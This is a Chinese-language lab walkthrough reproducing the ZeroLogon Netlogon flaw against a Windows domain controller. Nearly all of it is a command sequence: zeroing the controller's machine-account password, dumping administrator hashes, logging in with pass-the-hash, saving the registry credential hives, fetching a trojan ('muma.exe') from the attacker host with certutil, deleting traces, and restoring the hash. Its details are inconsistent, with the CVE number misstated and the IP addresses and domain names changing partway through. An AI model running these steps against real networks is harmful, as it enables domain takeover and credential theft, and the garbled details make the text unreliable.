zerologon漏洞复现
目录
-
zerologon漏洞复现
- 漏洞介绍
- 实验环境
-
实验开始
- 一、在github上下载脚本
- 二、检测是否可以利用
-
三、利用漏洞
- 1.清空域控账号密码
- 2.导出admin凭证
- 3.登录域控主机
-
恢复域控原始hash
-
一、导出源文件
- 1.生成文件
- 2.上传shell
- 3.导出文件
- 4.删除痕迹
- 二、解析文件
-
三、还原hash
- 1.还原
- 2.检测
漏洞介绍
CVE-2020-14722 (又称ZeroLogon
是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。
实验环境
攻击机:192.168.1.8 ubuntu
域控服务器:192.168.1.6 win2008r2
成员机:192.168.1.7 win7
实验开始
一、在github上下载脚本
git clone https://github.com/SecuraBV/CVE-2020-1472.git
git clone https://github.com/SecureAuthAuthCorp/impacket.git
由于我之前已经已经拉过了,就不放图了
二、检测是否可以利用
nbtstat -A 192.168.1.6 #查看域控主机名
python3 zerologon_tester.py WIN-E42RAKP2TJ2 192.168.1.6 #检测是否可以利用,相当于poc
三、利用漏洞
1.清空域控账号密码
git clone https://github.com/dirkjanm/CVE-2020-1472.git
python3 cve-2020-1472-exploit.py LLPP 172.16.124.194 #清空
2.导出admin凭证
secretsdump.py lpone.com/LLPP\$@172.16.124.194 -no-pass >1.txt #导出admin的凭证
3.登录域控主机
wmiexec.py admin@172.16.124.194 -hashes (上一步的hash值)
恢复域控原始hash
一、导出源文件
1.生成文件
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
2.上传shell
certutil -urlcache -split -f http://192.168.1.8/muma.exe
3.导出文件
download sam.save
download system.save
download security.save
4.删除痕迹
del -f *.save
二、解析文件
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
三、还原hash
1.还原
python3 restorepassword.py sshh.com/WIN-E42RAKP2TJ2@WIN-E42RAKP2TJ2 -target-ip 192.168.1.6 -hexpass 1b23bf335553baf29a8f78dee4b9b5a0
2.检测
python3 secretsdump.py sshh.com/WIN-E42RAKP2TJ2\$@192.168.1.6 -no-pass
还原成功!